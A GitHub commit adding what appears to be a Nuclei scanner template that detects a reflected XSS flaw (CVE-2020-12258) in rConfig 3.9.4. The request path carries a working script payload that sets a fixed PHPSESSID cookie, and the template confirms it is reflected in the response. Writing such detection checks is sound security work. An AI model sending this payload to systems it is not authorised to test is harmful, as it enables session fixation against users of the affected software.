Create CVE-2020-12258.yaml

patch-1
PikPikcU 2021-03-08 05:43:56 +00:00 committed by GitHub
parent 8278e02051
commit 290aaefa39
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: CVE-2020-12258
info:
name: rConfig 3.9.4 XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-12258
tags: cve,cve2020,rconfig,xss
requests:
- method: GET
path:
- '{{BaseURL}}/configDevice.php?rid="><script>document.cookie="PHPSESSID=123456789"</script>'
matchers-condition: and
matchers:
- type: word
words:
- "<script>document.cookie="PHPSESSID=123456789"</script>"
part: body
condition: and
- type: status
status:
- 200